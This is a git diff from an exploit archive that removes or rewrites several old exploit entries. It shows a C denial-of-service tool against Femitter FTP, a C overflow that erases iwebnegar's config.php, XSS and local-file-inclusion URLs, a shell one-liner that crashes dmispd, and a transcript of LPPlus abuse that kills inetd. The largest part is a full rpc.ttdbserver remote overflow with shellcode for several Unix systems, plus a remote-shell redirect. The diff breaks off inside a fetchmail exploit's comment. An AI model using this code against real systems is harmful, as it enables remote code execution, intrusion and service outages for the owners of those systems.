@@ -1,184 +0,0 @@ -/*0-----------------------------------------------------------------------------------0*\ -0 0 -| | -| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC | -| | -| Summary: Femitter Server is an easy-to use HTTP and FTP server application | -| for Windows which allows you to use your own computer for sharing gigabytes | -| of files with your friends and colleagues. | -| | -| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability | -| and memory corruption that causes the application to crash. When we send to | -| the RETR command an argument like AAAA:AAAA or an overly long string of As | -| (1024), the server crashes instantly. Also, when typing into browser: | -| ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD), | -| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at | -| address 004A218A in module "fem.exe". Write of address 00000000. | -| | -| Producst web page: http://acritum.com/fem/index.htm | -| | -| Tested on Microsoft Windows XP SP2 (English) | -| | -| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic | -| | -| liquidworm [t00t] gmail.com | -| | -| http://www.zeroscience.org/ | -| | -| 17.09.2008 | -| | -0 0 -\*0-----------------------------------------------------------------------------------0*/ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -#define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA" - - -void header(void); - - -int main (int argc, char *argv[]) -{ - - - int sckt = 0, sfd = 0; - char user[] = "USER admin\r\n"; - char pass[] = "PASS nimda\r\n"; - - unsigned char payload[]= - - "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - 
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 
- "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - 
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\xD\xA"; - - header(); - - if(argc != 3) - { - printf("\nUsage: %s [ip] [port]\n\n", argv[0]); - return (EXIT_SUCCESS); - } - - struct sockaddr_in dos_ftp; - sfd = socket(AF_INET, SOCK_STREAM, 0); - if(sfd < 0) - { - perror("Socket"); - printf("Error creating socket...\n"); - return(1); - } - - printf("\n\n[+] Socket created!\n"); - sleep (1); - - memset(&dos_ftp, 0x0, sizeof(dos_ftp)); - dos_ftp.sin_family = AF_INET; - dos_ftp.sin_addr.s_addr = inet_addr(argv[1]); - dos_ftp.sin_port = htons(atoi(argv[2])); - sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp)); - if(sckt < 0) - { - perror("Connect"); - printf("Error connecting...\n"); - return(1); - } - - printf("[+] Connection established!\n"); - sleep (1); - - write(sfd, user, strlen(user)); // username - printf("[+] Sending CMD: %s\n", user); - sleep (2); - - write(sfd, pass, strlen(pass)); // password - printf("[+] Sending CMD: %s\n", pass); - sleep (2); - - printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]); - sleep(2); - - send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0); - printf("[+] Malicious buffer succesfully sent...\n"); - sleep (1); - printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]); - - close (sfd); - - return(0); -} - -void header() -{ - printf("\n********************************************************************************\n\n"); - printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n"); - printf("\t\t\tby LiquidWorm \n\n"); - printf("********************************************************************************\n\n"); -} - -// milw0rm.com [2008-09-17] 
diff --git a/platforms/php/webapps/738.c b/platforms/php/webapps/738.c
deleted file mode 100755
index eb0755708..000000000
--- a/platforms/php/webapps/738.c
+++ /dev/null
@@ -1,95 +0,0 @@
-/*
- iwebnegar 1.1 remote exploit
- c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com
- bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein )
- compile with Ms visual C++ (the php version written by the bug finder but still priv8)
- greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com ,
- Jamie & Ben from exploitdev .
- Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? )
- */
- /* there is a limited buffer in the php code of iwebnegar when u overflow it , it will
- go to Die() functions which cause the erase of config.php
- */
-#include
-#include
-#include
-#include
-#pragma comment(lib, "ws2_32.lib")
-#define size 300
-
-
-
-int main (int argc, char *argv[]){
-
-
-
- char req[] =
- "GET /admin/conf_edit.php?";
- unsigned int rc,addr,sock ;
- struct sockaddr_in tcp;
- struct hostent * hp;
- WSADATA wsaData;
-char buffer[size];
-
- memset(buffer,'A',300);
- memcpy(buffer,req,25);
-
- if(argc < 2) {
- printf("\nusage : iwebnegar host\n");
- printf("example : iwebnegar.exe 127.0.0.1\n");
- exit(-1) ;
- }
-
- if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
- printf("WSAStartup failed !\n");
- exit(-1);
- }
- hp = gethostbyname(argv[1]);
- if (!hp){
- addr = inet_addr(argv[1]);
- }
- if ((!hp) && (addr == INADDR_NONE) ){
- printf("Unable to resolve %s\n",argv[1]);
- exit(-1);
- }
- sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
- if (!sock){
- printf("socket() error...\n");
- exit(-1);
- }
- if (hp != NULL)
- memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
- else
- tcp.sin_addr.s_addr = addr;
-
- if (hp)
- tcp.sin_family = hp->h_addrtype;
- else
- tcp.sin_family = AF_INET;
-
- tcp.sin_port=htons(80);
-
- printf("\n[+] attacking host %s\n" , argv[1]) ;
- printf("[+] Building overflow string\n");
- Sleep(1000);
- printf("[+] packet size = %d byte\n" , sizeof(buffer));
- rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
- if(rc==0)
- {
-
- Sleep(1000) ;
- printf("[+] 
connected\n") ;
-
- send(sock , buffer , sizeof(buffer) , 0);
-
- printf("[+] see if the config.php erased ! \n\n") ;
-
- }
- else {
- printf("the 80 port is not open try another webserver port\n");
-
-
- }
-}
-
-// milw0rm.com [2005-01-04]
diff --git a/platforms/php/webapps/7540.txt b/platforms/php/webapps/7540.txt
index 852e70455..fba40b982 100755
--- a/platforms/php/webapps/7540.txt
+++ b/platforms/php/webapps/7540.txt
@@ -1,17 +1,17 @@
-PHPg 1.6 has a few XSSes, path disclosures, and a DoS vulnerability.
-Home: http://black-dwarf.com
-HS: http://www.hotscripts.com/Detailed/86225.html
-Found by: Anarchy Angel - http://hha.zapto.org
-
-Temp XSS: http://site.com/phpg/index.php?url="> [XSS]
-
-Temp XSS: http://site/com/phpg/main-display-file.php?file= [XSS]
-
-Path disclosure: http://site/com/phpg/main-display-file.php?file= [anarchything] .jpg
-As long as the img/vid file does not exist you will get file path.
-
-Static XSS/Path disclosure: Uploading a file with % 3Cscript% 3Ealert% 28% 22Hacked% 20by% 20Anarchy% 20Angel% 22% 29% 3B% 3C% 2Fscript% 3E.jpg as its name "with out the spaces" Will give a path disclosure on the main page and a XSS when you view the file.
-
-DoS: Make a new folder with < script >alert('Hacked by Anarchy Angel') and you will no longer be able to use the app, you can also just rename a folder to do the same thing.
-
-# milw0rm.com [2008-12-21]
+PHPg 1.6 has a few XSSes, path disclosures, and a DoS vulnerability.
+Home: http://black-dwarf.com
+HS: http://www.hotscripts.com/Detailed/86225.html
+Found by: Anarchy Angel - http://hha.zapto.org
+
+Temp XSS: http://site.com/phpg/index.php?url="> [XSS]
+
+Temp XSS: http://site/com/phpg/main-display-file.php?file= [XSS]
+
+Path disclosure: http://site/com/phpg/main-display-file.php?file= [anarchything] .jpg
+As long as the img/vid file does not exist you will get file path.
+
+Static XSS/Path disclosure: Uploading a file with % 3Cscript% 3Ealert% 28% 22Hacked% 20by% 20Anarchy% 20Angel% 22% 29% 3B% 3C% 2Fscript% 3E.jpg as its name "with out the spaces" Will give a path disclosure on the main page and a XSS when you view the file.
+
+DoS: Make a new folder with < script >alert('Hacked by Anarchy Angel') and you will no longer be able to use the app, you can also just rename a folder to do the same thing.
+
+# milw0rm.com [2008-12-21]
diff --git a/platforms/php/webapps/7838.txt b/platforms/php/webapps/7838.txt
index 6fcb916a7..53064d95c 100755
--- a/platforms/php/webapps/7838.txt
+++ b/platforms/php/webapps/7838.txt
@@ -1,12 +1,12 @@
-##############################################
-# Dodo's Quiz Script Local File Inclusion Vulnerability
-##############################################
-[+] Author : Stack-Terrorist
-[+] v4-team.com
-==============================================
-Script : Dodo's Quiz Script
-#################################################
-Exploit : http://localsite/path/dodosquiz.php?n=[LocalFile]
-#################################################
-
-# milw0rm.com [2009-01-20]
+##############################################
+# Dodo's Quiz Script Local File Inclusion Vulnerability
+##############################################
+[+] Author : Stack-Terrorist
+[+] v4-team.com
+==============================================
+Script : Dodo's Quiz Script
+#################################################
+Exploit : http://localsite/path/dodosquiz.php?n=[LocalFile]
+#################################################
+
+# milw0rm.com [2009-01-20]
diff --git a/platforms/solaris/remote/19635.c b/platforms/solaris/remote/19635.c
deleted file mode 100755
index 9dfd2b43e..000000000
--- a/platforms/solaris/remote/19635.c
+++ /dev/null
@@ -1,286 +0,0 @@ -source: http://www.securityfocus.com/bid/811/info - -It is possible to crash rpc.ttdbserver by using the old tddbserver buffer overflow exploit. This problem is caused by a NULL pointer being dereferenced when rpc function 15 is called with garbage. You cannot make rpc.ttdbserver execute arbitrary code with this vulnerability. The consequence of this vulnerability being exploited is a denial of service condition (rpc.ttdbserver). - -/* - rpc.ttdbserver remote overflow, apk - Solaris (tested on SS5 and Ultra 2.5.1) - Irix (tested on r5k and r10k O2 6.3), - HP-UX ( tested on 700s 10.20) - - usage: ./r [-ku] [-p port] [-f outfile] host cmd - -k : kill ttdbserver (read below) - -u : use UDP (default TCP) - -p port : connect to ttdbserver at port (don't ask portmap) - -f outfile : store rpc message in outfile (and do NOT contact host) - - note: - it should compile on any normal system, to get HP-UX exploit compile with - -DHPUX, for Solaris -DSOLARIS, for Irix use -DIRIX - cmd is run through sh -c, and there is no practical limit for command - length, but it has to fit in buffer (1024 bytes in this case), - and ~(strlen + 1) cannot contain '0' - by default ttdbserver runs from inetd, so it will be respawned each time - it die (I mean execute command), also because it dies correct reply is - clnt_call error (connection reset, timeout etc) - -f file option: On HP-UX and Irix, connected socket gets first free - descriptor, 3 on HP-UX and 5 on Irix. You can use -f option to store - datagram to file, and send it to ttdbserver with your telnet of - choice. With command like "0<&3 1>&3 2>&3 exec sh" on HP-UX you'll get - remote shell running. Solaris dup() connected fd to first free one - over 256, so you have to study sh man page to find a way to do this - You should kill ttdbserver before, to make sure it doesn't have - any files open except 0-2 fds passed from inetd. 
Actually on Irix - it looks like fucked up, ttdbserver gets 0-2 fds from inetd, ignores - them and opens new ones as 3 and 4 fd, so you need to redirect 5th fd. - It happens on 6.3 at least, I need to look at other versions. - Irix is also the only one I saw which supports ttdbserver over UDP, - keep in mind that by default generated RPC datagram is TCP version with - record marking, you should use -u option to get UDP version (or just remove - first four bytes from generated file) - for reasons I can't quite understand, you _have_ to kil ttdbserver on Solaris - before sending a command there. When ttdbserver has connected clients, - it simply returns an error (filename too long). In both cases - it looks like the program goes through the same way, well, maybe I'll - get a clue one day what happens there. - On Irix to get over its fucked up cache, I simply send like 20kb to make - it flushed, so it's not reliable. You can find a buffer allocated by xdr - and it should be better. - surprizingly there are some differences between ttdbserver on above platforms, - like solaris dup() of fds, start-up Irix behaviour, the fact that - on Irix it first tries chdir to directory then do some task (it's the - reason I have to add "/f" at the end of buffer to have it copy overflow - part of the buffer on stack) etc. That's why it may not work on other - systems and versions than mentioned at the beginning. 
- - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define PORT 0 -#define BSIZE 1024 - -#if defined(SOLARIS) -# define SP 0xefffd618 -# define LENOFS 80 -char asmcode[]="\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x92\x03\xe0\x48\x90\x02\x60\x10\xe0\x02\x3f\xf0\xa2\x80\x3f\xff\xa0\x24\x40\x10\xd0\x22\x3f\xf0\xc0\x22\x3f\xfc\xa2\x02\x20\x09\xc0\x2c\x7f\xff\xe2\x22\x3f\xf4\xa2\x04\x60\x03\xc0\x2c\x7f\xff\xe2\x22\x3f\xf8\xa2\x04\x40\x10\xc0\x2c\x7f\xff\x82\x10\x20\x0b\x91\xd0\x20\x08\xff\xff\xff\xfc\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x2e\x2d\x63\x2e"; -char NOP[]="\x80\x1c\x40\x11"; -#endif - -#if defined(HPUX) -# define SP 0x7b03cc10 -# define LENOFS 84 -char asmcode[]="\xeb\x40\x40\x02\x0b\x39\x02\x80\xd7\x40\x0c\x1e\xb7\x5a\x20\xb8\x0b\x5a\x02\x59\x0f\x21\x10\x98\x97\x18\x07\xff\x0f\x39\x12\x81\x0f\x20\x12\x99\xb7\x39\x20\x10\x0f\x20\x12\x1f\x0f\x59\x12\x89\xb7\x39\x20\x06\x0f\x20\x12\x1f\x0f\x59\x12\x91\x0b\x38\x06\x19\x0f\x20\x12\x1f\xb7\x59\x07\xe1\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x10\x16\x11\x11\x11\x11\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e"; -char NOP[]="\x0b\x39\x02\x80"; -#endif - -#if defined(IRIX) -# define SP 0x7fff1b30 -# define LENOFS 76 -char asmcode[]="\x04\x10\xff\xff\x27\xe4\x01\x01\x24\x84\xff\x5e\x8c\x8c\xff\xe5\x24\x0d\xff\xff\x01\xac\x60\x23\x01\x84\x60\x20\xa1\x80\xff\xff\xa0\x80\xff\xff\xac\x84\xff\xed\x24\x84\xff\xfd\xa0\x80\xff\xff\xac\x84\xff\xec\x24\x84\xff\xf8\x24\x85\xff\xf0\xac\x84\xff\xf0\xac\x80\xff\xfc\x24\x02\x03\xf3\x02\x04\x8d\x0c\xff\xff\xff\xfc\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e"; -char NOP[]="\x24\x0f\x12\x34"; - -#endif - -#define TT_DBSERVER_PROG 100083 -#define TT_DBSERVER_VERS 1 -#define _TT_P 7 - -struct tt_reply { - int i1; - int i2; -}; - -void usage(char *s) { - 
printf("Usage: %s [-ku] [-p port] [-f outfile] host cmd\n", s); - exit(0); -} - -bool_t xdr_tt_reply(XDR *xdrs, struct tt_reply *objp) { - - if (!xdr_int(xdrs, &objp->i1)) - return (FALSE); - if (!xdr_int(xdrs, &objp->i2)) - return (FALSE); - return (TRUE); -} - -void make_file(char *fname, char *buf, int type); - -main(int argc, char *argv[]) { - extern int optind; - extern char *optarg; - CLIENT *cl; - enum clnt_stat stat; - struct timeval tm; - struct hostent *hp; - struct sockaddr_in target; - struct tt_reply op_res; - char buf[64000], *path, *cmd, *host, *bp, *outfile = NULL; - int sd, i, sp = SP, bsize = BSIZE, port = PORT, kill = 0, proto = 0; - - while ((i = getopt(argc, argv, "ukp:f:")) != EOF) - switch (i) { - case 'p': - port = atoi(optarg); - break; - case 'k': - kill = 1; - break; - case 'u': - proto = 1; - break; - case 'f': - outfile = optarg; - break; - default: - usage(argv[0]); - } - if (argc - optind < 2) - usage(argv[0]); - cmd = argv[optind + 1]; - host = argv[optind]; - - for (i = 0; i < sizeof(buf); i++) - *(buf + i) = NOP[i % 4]; - - i = bsize - strlen(asmcode) - strlen(cmd); - i &= 0xfffffffc; - strcpy(buf + i, asmcode); - strcat(buf, cmd); - *(int *)(buf + i + LENOFS) = ~(strlen(cmd) + 1); - buf[strlen(buf)] = '.'; - bp = buf + bsize; - for (i = 0; i < 16; bp+=4, i++) - *(int *)bp = sp; -#ifdef IRIX - sp = sp + 400 + 31652; - for (i = 0; i < 5000; bp+=4, i++) - *(int *)bp = sp; - *bp++ = '/'; - *bp++ = 'f'; - path = buf + 2; -#else - path = buf; -#endif - *bp = 0; - - if (outfile) { - make_file(outfile, buf, proto); - printf("rpc datagram stored in %s\n", outfile); - exit(0); - } - - if ((target.sin_addr.s_addr = inet_addr(host)) == -1) { - if ((hp = gethostbyname(host)) == NULL) { - printf("%s: cannot resolve\n", host); - exit(1); - } else - target.sin_addr.s_addr = *(u_long *)hp->h_addr; - } - target.sin_family = AF_INET; - target.sin_port = htons(port); - sd = RPC_ANYSOCK; - - tm.tv_sec = 4; - tm.tv_usec = 0; - if (proto) - cl = 
clntudp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, tm, &sd); - else - cl = clnttcp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, &sd, 0, 0); - if (cl == NULL) { - clnt_pcreateerror("clnt_create"); - exit(0); - } - cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); - tm.tv_sec = 10; - - if (kill) { - path = NULL; - bp = NULL; - if ((stat = clnt_call(cl, 15, xdr_wrapstring, (char *)&path, - xdr_wrapstring, (char *)&bp, tm)) != RPC_SUCCESS) { - clnt_perror(cl, "clnt_call"); - exit(1); - } - printf("Could not kill ttdbserver, reply is: %s\n", bp); - exit(1); - } - - if ((stat = clnt_call(cl, _TT_P, xdr_wrapstring, (char *)&path, xdr_tt_reply, - (char *)&op_res, tm)) != RPC_SUCCESS) { - clnt_perror(cl, "clnt_call"); - exit(1); - } - printf("res i1 %d, res i2 %d\n", op_res.i1, op_res.i2); - clnt_destroy(cl); -} - -void make_file(char *fname, char *buf, int type) { - int fd, offs; - XDR xdrm; - struct rpc_msg rpc_hdr; - struct authunix_parms aup; - char dgram[64000], rauth[MAX_AUTH_BYTES]; - - if (type == 1) /* UDP */ - offs = 4; - if ((fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0666)) == -1) { - perror(fname); - exit(1); - } - xdrmem_create(&xdrm, rauth, sizeof(rauth), XDR_ENCODE); - aup.aup_time = (u_long)time(NULL); - aup.aup_machname = "localhost"; - aup.aup_uid = 0; - aup.aup_gid = 0; - aup.aup_len = 0; - aup.aup_gids = NULL; - if (xdr_authunix_parms(&xdrm, &aup) == FALSE) { - printf("error encoding auth cred\n"); - exit(1); - } - rpc_hdr.rm_call.cb_cred.oa_length = xdr_getpos(&xdrm); - xdr_destroy(&xdrm); - xdrmem_create(&xdrm, dgram + 4, sizeof(dgram), XDR_ENCODE); - rpc_hdr.rm_xid = 0x12345678; - rpc_hdr.rm_direction = CALL; - rpc_hdr.rm_call.cb_rpcvers = 2; - rpc_hdr.rm_call.cb_prog = TT_DBSERVER_PROG; - rpc_hdr.rm_call.cb_vers = TT_DBSERVER_VERS; - rpc_hdr.rm_call.cb_proc = _TT_P; - rpc_hdr.rm_call.cb_cred.oa_flavor = AUTH_UNIX; - rpc_hdr.rm_call.cb_cred.oa_base = rauth; - rpc_hdr.rm_call.cb_verf.oa_flavor = AUTH_NONE; - 
rpc_hdr.rm_call.cb_verf.oa_base = NULL;
- rpc_hdr.rm_call.cb_verf.oa_length = 0;
- if (xdr_callmsg(&xdrm, &rpc_hdr) == FALSE) {
- printf("error encoding rpc header\n");
- exit(1);
- }
- if (xdr_wrapstring(&xdrm, &buf) == FALSE) {
- printf("error encoding rpc data\n");
- exit(1);
- }
- /* record marking */
- *(u_int *)dgram = 0x80000000 | xdr_getpos(&xdrm);
- if (write(fd, dgram + offs, xdr_getpos(&xdrm) + 4) == -1) {
- perror("write");
- exit(1);
- }
- xdr_destroy(&xdrm);
- close(fd);
-}
-
diff --git a/platforms/solaris/remote/19681.txt b/platforms/solaris/remote/19681.txt
deleted file mode 100755
index 99114ee5b..000000000
--- a/platforms/solaris/remote/19681.txt
+++ /dev/null
@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/878/info
-
-DMI is the Desktop Management Interface, and is a suite of application management programs shipped with Sun's Solaris. Each application that is managed through DMI has a MIF record (which contains information about its managable components and properties) that can be inserted into the MIF database (/var/dmi/db) through the dmisp (DMI Service Providor) daemon. There is no authentication performed on who submits new MIFs, meaning anybody can do it. This creates two possible denial of service conditions. The first is consumption of disk space in /var. There are no limits (set by default) on how much space the DMI database can use. This may be used in conjunction with other vulnerabilities to prevent logging, etc. A second vulnerability is a buffer overflow condition in dmispd when MIFs are a certain size. It may be exploitable beyond being a simple denial of service (it may be possible to execute arbitrary code as root remotely).
-
-Buffer Overflow Crash:
-
-echo `perl -e "print 'A' x 1000"` > /usr/home/btellier/my.mif
-dmi_cmd -CI ../../../usr/home/btellier/my.mif
-
-(dmispd segfaults)
\ No newline at end of file
diff --git a/platforms/unix/local/20192.txt b/platforms/unix/local/20192.txt
deleted file mode 100755
index fc30aef3e..000000000
--- a/platforms/unix/local/20192.txt
+++ /dev/null
@@ -1,53 +0,0 @@ -source: http://www.securityfocus.com/bid/1643/info - -Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include: - -$LPHOME/bin/dccsched -$LPHOME/bin/dcclpdser -$LPHOME/bin/dccbkst - -These start the scheduler, LPD server and network status daemons. - -$LPHOME/bin/dccshut -$LPHOME/bin/dcclpdshut -$LPHOME/bin/dccbkstshut - -These stop the same services. - -By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group. - -Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process. - -Vulnerability #1: - -$ id -uid=600(test) gid=300(users) -$ ps -ef|grep dcc -test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc -root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched -root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser -root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst -$ dccbkstshut -$ dcclpdshut -LPD048E Signal sent to dcclpdser to shut down. -$ dccshut -LPP054I LP Plus scheduler ordered to shutdown. -$ ps -ef|grep dcc -test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc -$ - -Vulnerability #2 - -$ id -uid=600(test) gid=300(users) -$ ps -ef|grep inet -test 26285 26279 0 17:42:42 pts/0 0:00 grep inet -root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s -$ cat > $LPHOME/system/lpdprocess -12276 -^D -$ dcclpdshut -LPD048E Signal sent to dcclpdser to shut down. -$ ps -ef|grep inet -test 26291 26279 0 17:45:17 pts/0 0:00 grep inet -$ \ No newline at end of file 
diff --git a/platforms/unix/remote/21064.c b/platforms/unix/remote/21064.c
deleted file mode 100755
index c62fdef48..000000000
--- a/platforms/unix/remote/21064.c
+++ /dev/null
@@ -1,63 +0,0 @@ -source: http://www.securityfocus.com/bid/3164/info - -Fetchmail is a unix utility for downloading email from mail servers via POP3. - -Fetchmail contains a vulnerability that may allow for remote attackers to gain access to client systems. The vulnerability has to do with the use of a remotely supplied signed integer value as the index to an array when writing data to memory. - -It is be possible for attackers to overwrite critical variables in memory with arbitrary values if the target client's POP3 server can be impersonated. Successful exploitation can lead to the exectution of arbitrary code on the client host. - -/* fetchmail proof of concepts i386 exploit - * Copyright (C) 2001 Salvatore Sanfilippo - * Code under the GPL license. - * - * Usage: ./a.out | nc -l -p 3333 - * fetchmail localhost -P 3333 -p POP3 - * - * This is a bad exploit with offset carefully selected - * to work in my own system. It will probably not work in - * your system if you don't modify RETR_OFFSET and SHELL_PTR, - * but you may try to set the 